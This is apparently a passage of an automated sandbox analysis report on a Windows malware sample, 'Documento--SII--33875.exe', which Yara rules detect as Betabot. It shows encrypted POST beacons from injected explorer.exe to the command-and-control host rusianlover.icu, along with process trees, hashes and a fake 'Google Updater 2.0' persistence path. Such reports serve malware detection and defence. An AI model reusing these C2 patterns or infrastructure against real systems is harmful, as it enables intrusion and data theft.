43 33 43 45 46 46 36 35 30 46 39 44 34 38 42 45 46 43 36 30 42 43 45 44 33 35 35 34 44 32 36 39 43 42 46 31 41 33 36 36 32 36 33 34 30 37 42 44 34 41 31 31 41 42 35 31 37 30 33 43 45 42 46 35 31 42 46 42 46 45 36 37 42 42 42 42 36 46 39 31 38 44 42 39 46 45 31 44 39 34 35 39 35 31 42 35 44 45 35 32 39 33 46 38 31 36 37 32 36 41 31 42 32 36 39 46 31 43 38 41 44 30 41 43 41 42 35 34 34 43 45 44 34 35 36 43 31 41 37 36 42 34 46 31 46 44 39 46 38 46 43 44 31 41 45 45 38 41 38 36 34 43 37 36 36 31 36 30 42 37 43 43 46 39 30 44 38 41 33 32 36 38 30 31 39 39 31 42 44 33 46 30 38 46 30 34 37 31 32 41 31 43 30 46 33 37 33 34 33 34 32 42 32 43 36 31 37 44 35 37 33 41 44 41 31 35 42 46 31 42 34 30 45 45 38 45 38 30 44 32 42 34 41 32 44 41 38 39 38 46 41 42 36 35 41 44 43 39 41 41 36 38 41 39 34 41 39 32 31 33 41 32 46 43 45 36 35 46 36 39 37 37 45 42 33 38 41 41 45 41 34 30 30 45 36 34 36 30 35 38 41 39 44 39 37 39 34 30 45 34 32 46 39 43 30 32 44 35 45 30 38 33 35 44 46 46 46 37 34 38 38 39 42 34 37 36 43 43 34 36 45 34 45 33 36 31 38 45 37 30 38 37 45 38 35 44 44 39 39 44 33 36 31 46 39 45 34 39 34 42 46 30 38 42 31 39 42 38 36 32 42 42 46 45 41 43 42 45 45 45 37 41 38 45 36 41 43 36 30 34 39 30 35 31 39 45 34 33 30 31 38 30 31 33 31 30 43 42 33 31 33 43 32 36 42 36 46 33 36 46 38 31 37 44 35 34 30 46 41 32 35 36 34 37 35 31 46 30 45 33 44 46 43 32 46 35 39 45 44 31 38 35 37 43 45 46 38 45 32 44 32 44 42 36 46 43 39 44 41 46 43 36 46 31 32 31 35 31 42 30 36 Data Ascii: xurol=21606127&zyxwvut=70B422191C18ECB2F7C88E0C4DF6B0CB9E57840A562E4C&bcdefghij=A5E848D8BAECF742676E54D5D697FA6CF47BA7B18A85CE5722EBC2A15A1E6C0ED19973F909789D216255CE3B00BFAC3CEFF650F9D48BEFC60BCED3554D269CBF1A366263407BD4A11AB51703CEBF51BFBFE67BBBB6F918DB9FE1D945951B5DE5293F816726A1B269F1C8AD0ACAB544CED456C1A76B4F1FD9F8FCD1AEE8A864C766160B7CCF90D8A326801991BD3F08F04712A1C0F3734342B2C617D573ADA15BF1B40EE8E80D2B4A2DA898FAB65ADC9AA68A94A9213A2FCE65F6977EB38AAEA400E646058A9D97940E42F9C02D5E0835DFFF74889B476CC46E4E3618E7087E85DD99D361F9E494BF08B19B862BBFEACBEEE7A8E6AC60490519E4301801310CB313C26B6F36F817D540FA2564751F0E3DFC2F59ED1857CEF8E2D2DB6FC9DAFC6F12151B06
Mar 10, 2021 11:42:42.394654989 CET	1984	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 65 e2 3a 18 f0 0c 2d 1a 4c a9 a2 55 9f de 29 49 0b 7f 41 0f 23 8a 00 53 ce cd e5 ad 8e e3 f9 6b 97 04 22 ed 8f 19 69 97 66 5d 5f 2f ff 52 fc f7 aa bb 38 c0 af f9 3d d2 1a de 86 a8 37 eb d3 4c 2a 89 a3 94 97 26 bd 2e bd 35 5f 09 6c 7a 93 4d 81 8a 3e 54 da bb 94 e0 a6 f1 3b 8d c4 9d 12 1d 13 23 53 b0 92 fb 08 39 d0 9e 4d 9a 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6de:-LU)IA#Sk"if]_/R8=7L*&.5_lzM>T;#S9M0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49726	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:45.201111078 CET	2030	OUT	POST /forum/logout.php?page=83 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 644 Cache-Control: no-cache Data Raw: 76 77 78 79 74 75 76 77 72 3d 36 39 31 36 36 35 37 31 26 78 61 64 67 64 3d 36 64 36 37 64 32 36 36 33 37 34 35 61 32 63 63 32 37 32 64 31 35 65 65 31 38 26 7a 65 6a 6f 6e 73 78 3d 32 46 31 30 30 35 38 32 35 39 34 32 34 42 32 34 39 39 35 33 42 39 32 41 32 45 38 31 32 33 34 41 43 33 45 33 41 35 33 35 42 37 32 42 39 44 46 43 39 32 39 45 42 44 38 33 43 45 46 38 36 44 34 39 32 31 38 36 45 45 41 44 41 41 34 36 33 43 31 46 31 37 36 32 37 46 39 32 34 35 37 42 31 42 43 34 34 46 42 45 33 44 30 30 43 33 41 41 30 30 42 31 46 42 44 41 39 35 44 46 34 31 35 39 38 41 46 32 33 39 38 46 42 43 37 45 42 32 36 33 42 33 39 43 32 39 34 38 37 43 34 45 30 46 43 31 34 33 32 44 34 34 44 45 45 43 37 34 30 43 36 39 32 33 46 46 36 45 41 44 33 44 34 30 44 39 31 44 43 35 38 43 36 38 44 31 36 42 42 43 36 46 32 36 36 42 37 39 43 43 43 32 35 31 45 37 43 41 35 42 30 43 39 38 33 34 34 30 43 31 31 34 32 33 30 33 32 43 46 34 33 36 42 46 38 38 37 35 32 38 37 33 30 46 46 32 31 41 42 37 45 39 32 38 43 43 42 34 38 44 46 45 32 46 41 33 45 42 36 34 34 33 37 34 36 30 38 32 45 35 39 35 31 33 42 32 34 43 42 43 33 30 43 32 41 32 46 33 30 31 44 36 46 31 32 32 44 41 32 41 30 39 41 38 34 35 33 36 30 30 36 36 42 33 41 39 32 34 32 34 42 33 34 33 39 34 36 46 44 38 46 44 42 36 46 35 37 30 31 35 44 31 42 32 35 38 46 43 41 44 39 37 36 33 42 46 36 34 39 38 33 35 35 33 32 34 35 45 36 31 35 41 43 31 32 33 38 38 31 30 30 44 46 43 45 39 33 38 44 34 38 31 32 46 42 31 45 34 39 42 31 36 46 43 34 44 43 34 41 41 46 43 46 34 34 37 46 39 43 42 35 38 36 30 42 42 41 46 43 38 35 42 32 32 41 32 43 30 32 36 43 31 31 41 38 30 36 34 43 32 42 32 32 32 38 45 30 34 34 45 36 37 41 31 30 39 45 31 41 37 30 37 39 39 35 45 36 38 38 36 41 44 38 39 36 31 38 43 39 34 36 32 30 42 39 39 35 34 30 43 43 34 31 41 32 37 44 42 41 45 32 30 44 42 43 38 33 34 37 36 34 36 36 42 45 30 42 32 44 32 46 30 31 39 34 33 30 46 34 31 46 42 31 45 41 36 46 33 33 35 43 38 46 32 39 30 44 37 45 43 39 36 39 45 Data Ascii: vwxytuvwr=69166571&xadgd=6d67d2663745a2cc272d15ee18&zejonsx=2F10058259424B249953B92A2E81234AC3E3A535B72B9DFC929EBD83CEF86D492186EEADAA463C1F17627F92457B1BC44FBE3D00C3AA00B1FBDA95DF41598AF2398FBC7EB263B39C29487C4E0FC1432D44DEEC740C6923FF6EAD3D40D91DC58C68D16BBC6F266B79CCC251E7CA5B0C983440C11423032CF436BF887528730FF21AB7E928CCB48DFE2FA3EB6443746082E59513B24CBC30C2A2F301D6F122DA2A09A845360066B3A92424B343946FD8FDB6F57015D1B258FCAD9763BF64983553245E615AC12388100DFCE938D4812FB1E49B16FC4DC4AAFCF447F9CB5860BBAFC85B22A2C026C11A8064C2B2228E044E67A109E1A707995E6886AD89618C94620B99540CC41A27DBAE20DBC83476466BE0B2D2F019430F41FB1EA6F335C8F290D7EC969E
Mar 10, 2021 11:42:45.268615007 CET	2031	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a d5 0f 50 08 03 5f 9f 74 c4 dc c5 c4 02 57 c8 58 92 b7 0b 10 ca d0 53 95 46 22 4d 3f 49 34 ae 20 07 93 a2 a3 f3 6c d9 00 92 d8 38 b3 bb 24 bb 70 29 df 31 6e 4b 0c 14 50 1f 15 60 52 82 1b 9f b5 4c 9e 76 17 b2 72 60 f5 8d 14 72 12 92 3e 78 18 90 b4 3f e8 cc f6 7a f9 57 3b 05 30 58 36 1d 44 10 0d e8 2c a6 e7 88 57 f1 fc 75 93 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dP_tWXSF"M?I4 l8$p)1nKP`RLvr`r>x?zW;0X6D,Wu0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49727	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:48.520873070 CET	2033	OUT	POST /forum/logout.php?id=2140088 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 679 Cache-Control: no-cache Data Raw: 6f 69 63 77 71 6b 3d 32 39 34 33 35 31 36 32 26 71 6d 69 65 61 77 73 69 3d 35 33 65 39 36 35 66 38 32 33 38 36 66 64 34 38 66 38 30 35 35 33 63 31 65 31 30 66 36 64 38 65 31 35 37 37 65 36 31 32 30 64 36 39 31 35 61 32 31 39 36 66 63 31 66 32 38 66 32 61 33 38 38 64 26 73 71 6f 6d 3d 41 44 41 32 46 44 34 36 34 38 43 43 36 36 46 37 33 36 45 45 42 42 42 42 33 35 30 35 32 31 36 39 31 31 34 31 43 37 43 39 44 44 35 38 46 38 44 30 31 42 43 39 37 32 30 46 33 37 46 30 30 44 42 30 41 39 42 30 44 38 37 41 36 45 44 38 46 41 37 44 39 30 39 41 35 31 39 34 41 31 36 33 32 33 31 42 33 35 46 35 43 41 46 31 37 35 30 45 31 31 36 41 41 39 42 43 44 32 35 37 36 41 31 34 42 39 32 36 44 32 46 46 36 36 44 42 35 35 38 44 30 41 36 39 33 43 43 35 39 39 30 42 35 41 39 36 32 32 34 45 46 31 34 43 42 39 38 31 33 37 31 30 38 37 30 39 33 33 42 30 38 33 43 44 42 39 32 46 30 32 43 39 44 41 35 43 34 32 42 32 43 46 39 45 30 39 44 33 36 35 34 42 43 35 44 41 42 39 41 34 32 37 41 37 36 35 44 45 43 46 45 42 33 39 42 33 41 34 37 31 45 42 32 38 37 38 30 34 33 33 38 31 31 33 31 36 43 32 34 46 44 42 35 34 42 32 46 38 38 46 45 35 33 31 33 42 35 45 41 30 37 36 45 35 44 41 44 41 38 38 39 33 39 31 45 35 46 34 35 31 30 35 37 45 43 44 38 33 38 31 38 32 39 46 34 41 35 45 35 33 38 39 32 45 30 35 38 37 37 46 32 31 32 37 41 36 32 33 46 43 38 42 45 38 30 43 34 41 43 37 35 45 35 32 33 36 38 42 42 44 31 30 41 34 31 35 31 34 37 42 36 35 38 35 31 41 38 43 38 30 33 42 34 35 41 43 37 30 31 32 34 42 32 32 39 37 32 34 35 35 43 37 38 43 34 36 44 43 45 32 31 34 39 39 33 31 31 46 45 44 38 45 36 38 33 31 35 33 42 44 41 33 38 34 30 41 44 41 44 46 33 38 33 39 34 45 42 35 37 32 36 33 37 36 46 38 45 30 33 46 30 32 46 38 36 43 35 38 46 36 35 39 33 39 31 46 43 39 31 34 39 44 39 38 41 34 38 41 33 42 31 38 43 35 39 32 45 36 44 46 44 36 42 36 38 45 43 38 36 35 36 37 34 46 45 44 38 31 46 32 39 41 36 34 37 46 38 33 43 30 36 34 42 42 34 33 34 44 37 31 32 42 35 32 33 34 33 34 42 36 32 35 39 46 34 46 45 36 35 36 41 30 44 37 33 30 30 45 36 30 37 39 41 31 36 45 36 35 38 32 39 43 46 37 Data Ascii: oicwqk=29435162&qmieawsi=53e965f82386fd48f80553c1e10f6d8e1577e6120d6915a2196fc1f28f2a388d&sqom=ADA2FD4648CC66F736EEBBBB350521691141C7C9DD58F8D01BC9720F37F00DB0A9B0D87A6ED8FA7D909A5194A163231B35F5CAF1750E116AA9BCD2576A14B926D2FF66DB558D0A693CC5990B5A96224EF14CB9813710870933B083CDB92F02C9DA5C42B2CF9E09D3654BC5DAB9A427A765DECFEB39B3A471EB28780433811316C24FDB54B2F88FE5313B5EA076E5DADA889391E5F451057ECD8381829F4A5E53892E05877F2127A623FC8BE80C4AC75E52368BBD10A415147B65851A8C803B45AC70124B22972455C78C46DCE21499311FED8E683153BDA3840ADADF38394EB5726376F8E03F02F86C58F659391FC9149D98A48A3B18C592E6DFD6B68EC865674FED81F29A647F83C064BB434D712B523434B6259F4FE656A0D7300E6079A16E65829CF7
Mar 10, 2021 11:42:48.590410948 CET	2034	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a a9 fc 0a 4b 53 bf 7c 5e c3 87 90 35 01 6c 1f cf 75 98 cb 07 8e b2 cc 74 a8 97 82 9e 6f 7a e0 c9 8c c3 80 d5 ca 8e 0b f3 eb 9c bd a7 c1 81 9d 27 32 98 48 f0 fa 04 f0 67 b3 c8 2d 62 af 22 ff 86 be 93 f6 f4 fc 6d 17 51 e5 01 24 08 85 a8 5c e2 fb cc 2d 6b f6 33 a7 7b 7e 47 a6 77 2d 64 53 75 d6 89 ce c9 31 74 a6 99 ac d2 9c c5 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dKS\|^5lutoz'2Hg-b"mQ$\-k3{~Gw-dSu1t0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49729	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:51.355341911 CET	2038	OUT	POST /forum/logout.php?id=9885598 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 646 Cache-Control: no-cache Data Raw: 7a 65 6a 6f 74 3d 35 39 39 37 35 34 38 35 26 62 69 70 77 64 6b 72 3d 43 45 33 42 36 34 37 42 32 45 41 35 41 36 31 43 31 31 37 31 46 30 32 44 39 37 34 32 26 64 6d 76 65 6e 77 66 6f 78 3d 35 46 33 30 41 46 45 41 30 39 43 44 38 33 42 38 43 32 44 35 34 38 45 30 35 38 31 39 46 45 43 44 33 37 41 34 33 30 38 43 43 36 42 30 43 34 42 39 36 44 45 32 31 38 30 45 38 35 34 32 45 45 35 31 43 30 39 46 46 32 37 44 45 46 37 30 36 32 45 34 43 44 30 37 43 36 33 45 45 33 46 37 39 35 46 38 37 37 33 42 35 35 37 41 45 42 38 39 46 33 46 46 41 38 44 36 37 44 31 42 46 43 36 32 36 37 33 44 30 33 37 39 46 36 42 37 38 34 34 33 43 35 41 31 46 46 30 44 30 34 37 36 35 34 36 43 41 35 30 37 46 33 43 41 44 37 36 33 35 46 45 35 37 43 41 35 43 45 39 37 38 46 42 41 30 37 36 30 45 37 45 38 42 41 42 36 32 43 35 39 42 32 37 45 33 44 36 45 37 41 36 38 42 41 39 45 38 34 37 42 35 42 32 30 42 37 43 41 44 36 37 45 39 41 35 43 44 45 35 45 37 37 35 43 45 39 35 45 34 39 46 46 36 39 31 35 36 30 46 31 38 38 46 44 30 35 45 32 35 42 44 42 35 39 37 32 33 41 36 35 34 41 33 32 30 44 41 39 42 39 37 41 42 30 44 34 43 35 35 45 36 43 32 34 31 38 33 42 41 36 33 36 36 45 44 42 39 30 44 46 41 38 39 41 31 45 32 44 37 35 32 33 30 36 38 46 30 32 41 32 46 37 37 42 31 43 33 35 39 45 31 33 37 32 34 36 42 41 30 36 35 32 34 46 46 37 46 34 44 44 39 36 44 32 45 44 43 41 33 43 37 32 30 43 41 37 43 32 32 46 30 46 34 44 46 33 45 35 44 37 35 32 37 45 44 30 34 41 39 33 33 31 42 44 44 34 31 44 31 36 30 45 39 36 45 32 33 44 35 34 45 46 37 32 43 36 43 46 38 44 38 33 37 45 32 43 31 46 30 44 33 32 35 36 42 30 35 41 45 31 45 41 34 32 42 37 44 44 30 46 34 34 38 30 41 36 41 38 42 46 41 32 36 39 31 43 33 44 31 38 44 38 34 36 31 46 32 36 38 33 37 31 32 46 45 35 42 37 46 32 32 36 37 35 45 38 38 43 45 30 33 34 36 43 41 35 42 31 36 34 37 35 38 34 35 36 35 43 44 33 34 33 42 32 35 45 30 44 38 31 41 45 46 33 34 34 42 31 31 43 43 32 43 44 43 35 42 42 32 32 43 42 41 31 42 41 38 35 36 44 35 37 32 35 Data Ascii: zejot=59975485&bipwdkr=CE3B647B2EA5A61C1171F02D9742&dmvenwfox=5F30AFEA09CD83B8C2D548E05819FECD37A4308CC6B0C4B96DE2180E8542EE51C09FF27DEF7062E4CD07C63EE3F795F8773B557AEB89F3FFA8D67D1BFC62673D0379F6B78443C5A1FF0D0476546CA507F3CAD7635FE57CA5CE978FBA0760E7E8BAB62C59B27E3D6E7A68BA9E847B5B20B7CAD67E9A5CDE5E775CE95E49FF691560F188FD05E25BDB59723A654A320DA9B97AB0D4C55E6C24183BA6366EDB90DFA89A1E2D7523068F02A2F77B1C359E137246BA06524FF7F4DD96D2EDCA3C720CA7C22F0F4DF3E5D7527ED04A9331BDD41D160E96E23D54EF72C6CF8D837E2C1F0D3256B05AE1EA42B7DD0F4480A6A8BFA2691C3D18D8461F2683712FE5B7F22675E88CE0346CA5B1647584565CD343B25E0D81AEF344B11CC2CDC5BB22CBA1BA856D5725
Mar 10, 2021 11:42:51.430608988 CET	2038	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a ac b5 76 0c 34 8b 53 0d 54 c7 ed 43 1d 60 73 31 4a f2 96 29 da e3 b9 b8 cb be 0c 0c 9d cc 17 bb dd 34 22 5b e6 a2 b7 b5 d5 fc f4 b9 b0 66 24 71 3b a9 b4 05 1d a2 0e d3 c9 65 83 76 07 62 0d 7a a1 11 e8 7c 95 47 38 25 75 b4 54 c4 26 6d a2 a5 0f 37 1f e9 3e 69 2e 62 43 14 84 4d 2b 1a 6a d9 50 c9 0f 7e 50 37 c5 42 3a 92 83 43 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dv4STC`s1J)4"[f$q;evbz\|G8%uT&m7>i.bCM+jP~P7B:C0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Mar 10, 2021 11:42:29.744301081 CET	104.21.55.228	443	192.168.2.5	49717	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jul 28 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Wed Jul 28 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-24-65281,29-23-24,0	57f3642b4e37e28f5cbe3020c9331b4c
Mar 10, 2021 11:42:29.744301081 CET	104.21.55.228	443	192.168.2.5	49717	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		57f3642b4e37e28f5cbe3020c9331b4c

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Documento--SII--33875.exe PID: 5464 Parent PID: 5712

General

Start time:	11:41:51
Start date:	10/03/2021
Path:	C:\Users\user\Desktop\Documento--SII--33875.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Documento--SII--33875.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

Analysis Process: Documento--SII--33875.exe PID: 4948 Parent PID: 5464

General

Start time:	11:41:52
Start date:	10/03/2021
Path:	C:\Users\user\Desktop\Documento--SII--33875.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Documento--SII--33875.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

General

Start time:	11:41:54
Start date:	10/03/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe0000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

General

Start time:	11:41:58
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: CpSHySoEfzH.exe PID: 240 Parent PID: 3696

General

Start time:	11:42:00
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: CpSHySoEfzH.exe PID: 4644 Parent PID: 3696

General

Start time:	11:42:01
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x7ff797770000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: CpSHySoEfzH.exe PID: 3060 Parent PID: 3696

General

Start time:	11:42:03
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: CpSHySoEfzH.exe PID: 4668 Parent PID: 3696

General

Start time:	11:42:04
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: 9sek3aw7533q9.exe PID: 736 Parent PID: 3472

General

Start time:	11:42:06
Start date:	10/03/2021
Path:	C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

Analysis Process: 9sek3aw7533q9.exe PID: 6208 Parent PID: 736

General

Start time:	11:42:07
Start date:	10/03/2021
Path:	C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

File Activities

File Read

Analysis Process: CpSHySoEfzH.exe PID: 4612 Parent PID: 3696

General

Start time:	11:42:10
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: CpSHySoEfzH.exe PID: 2588 Parent PID: 3696

General

Start time:	11:42:11
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: CpSHySoEfzH.exe PID: 1688 Parent PID: 3696

General

Start time:	11:42:13
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Analysis Process: 9sek3aw7533q9.exe PID: 6576 Parent PID: 3472

General

Start time:	11:42:14
Start date:	10/03/2021
Path:	C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

Analysis Process: CpSHySoEfzH.exe PID: 2248 Parent PID: 3696

General

